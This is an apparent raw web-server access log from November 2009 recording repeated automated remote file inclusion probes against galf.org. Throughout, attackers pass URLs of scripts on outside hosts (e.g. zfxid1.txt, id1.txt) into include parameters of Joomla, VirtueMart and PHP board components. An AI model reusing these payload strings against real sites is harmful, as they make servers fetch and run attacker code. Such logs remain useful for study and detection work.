118.107.162.36 - - [23/Nov/2009:05:55:50 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:55:50 -0800] "GET /logs/access_090504.log%20%20///modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:55:50 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:05:55:55 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:05:55:55 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:55:56 -0800] "GET /logs/access_091102.log%20%20///modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:55:58 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:55:58 -0800] "GET /logs/access_090504.log%20%20///modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:55:58 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:05:55:58 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:56:02 -0800] "GET /logs/access_091102.log%20%20///modules/xfsection/modify.php?dir_module=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:56:17 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:56:17 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:56:17 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:56:46 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:57:10 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:57:10 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:57:10 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:57:14 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:57:31 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:57:37 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:57:49 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:57:50 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:57:55 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:58:29 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:58:41 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:59:20 -0800] "GET /tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:05:59:20 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:05:59:21 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.95.231.98 - - [23/Nov/2009:06:00:18 -0800] "GET /logs/access_090713.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:06:00:32 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [23/Nov/2009:06:00:40 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:06:00:45 -0800] "GET /logs/access_090713.log%20%20//tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:00:45 -0800] "GET /tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:00:45 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:06:00:47 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [23/Nov/2009:06:00:55 -0800] "GET /logs/access_090427.log//registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:06:01:27 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:01:42 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:01:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:01:47 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:01:47 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:02:48 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:02:53 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:06:02:55 -0800] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:06:03:15 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:06:03:15 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:06:03:15 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:06:03:18 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
157.100.230.82 - - [23/Nov/2009:06:03:18 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
157.100.230.82 - - [23/Nov/2009:06:03:18 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
157.100.230.82 - - [23/Nov/2009:06:04:02 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:06:04:02 -0800] "GET /logs/access_090914.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:06:04:02 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:06:04:21 -0800] "GET /logs/access_090914.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:06:04:37 -0800] "GET /logs/access_090622.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:06:05:43 -0800] "GET /logs/access_090622.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.207.160.101 - - [23/Nov/2009:06:05:54 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.207.160.101 - - [23/Nov/2009:06:05:54 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.207.160.101 - - [23/Nov/2009:06:05:54 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:06:06:01 -0800] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:06:07:04 -0800] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [23/Nov/2009:06:07:25 -0800] "GET /logs/access.log//registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.212.26.195 - - [23/Nov/2009:06:07:55 -0800] "GET /logs/access_091102.log%20%20//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.212.26.195 - - [23/Nov/2009:06:07:55 -0800] "GET /logs//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.212.26.195 - - [23/Nov/2009:06:07:55 -0800] "GET /skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:06:09:58 -0800] "GET /logs/access_090803.log//admin/spaw/spaw_control.class.php?spaw_root=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:31 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:31 -0800] "GET /logs/access_090706.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:31 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.112.35.43 - - [23/Nov/2009:06:10:35 -0800] "GET /logs/access_091102.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.112.35.43 - - [23/Nov/2009:06:10:35 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
217.112.35.43 - - [23/Nov/2009:06:10:35 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:39 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:40 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:41 -0800] "GET /logs/access_090706.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:45 -0800] "GET /logs/access_090706.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:45 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:46 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:49 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:49 -0800] "GET /logs/access_090706.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:50 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:50 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:51 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:51 -0800] "GET /logs/access_090706.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:54 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:54 -0800] "GET /logs/access_090706.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:06:10:54 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.112.35.43 - - [23/Nov/2009:06:11:15 -0800] "GET /logs/access_090921.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:06:11:22 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:06:11:22 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:06:11:22 -0800] "GET /logs/access_090803.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:06:12:45 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:06:12:49 -0800] "GET /logs/access_091102.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:06:12:49 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
207.7.108.203 - - [23/Nov/2009:06:13:02 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.7.108.203 - - [23/Nov/2009:06:13:02 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:13:44 -0800] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:13:45 -0800] "GET /skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:13:47 -0800] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:13:48 -0800] "GET /logs/access_091102.log%20%20//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:14:30 -0800] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:14:30 -0800] "GET /logs/access_091102.log%20%20//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:14:31 -0800] "GET /skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.7.108.203 - - [23/Nov/2009:06:16:25 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.7.108.203 - - [23/Nov/2009:06:16:25 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.7.108.203 - - [23/Nov/2009:06:16:27 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:16:43 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:16:43 -0800] "GET /logs/access_090622.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:16:44 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:06:16:45 -0800] "GET /logs/access_090622.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "